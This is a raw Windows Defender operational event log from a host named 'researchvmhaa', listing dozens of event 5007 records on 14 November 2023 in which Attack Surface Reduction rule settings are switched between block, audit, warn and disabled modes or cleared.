Type=Information
RecordNumber=550
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=549
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=548
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=547
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x0
11/14/2023 10:20:24 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=546
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0
New value:
11/14/2023 10:20:24 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=545
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=544
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=543
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=542
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=541
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=540
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=539
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=538
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=537
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=536
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=535
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=534
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=533
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=532
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=531
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=530
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=529
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=528
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=527
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=526
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=525
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=524
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=523
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=522
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=521
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=520
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=519
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=518
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=517
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=516
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=515
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=514
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2
11/14/2023 10:17:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=513
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
New value:
11/14/2023 10:17:43 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=512
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2
11/14/2023 10:17:43 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=511
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
11/14/2023 10:12:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=510
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
New value:
11/14/2023 10:12:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=509
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
11/14/2023 10:08:58 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=508
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
New value:
11/14/2023 10:08:58 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=507
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
11/14/2023 10:07:53 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=506
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
New value:
11/14/2023 10:07:53 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=505
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
11/14/2023 09:57:38 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=502
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
New value:
11/14/2023 09:57:38 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=501
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
11/14/2023 09:44:45 PM
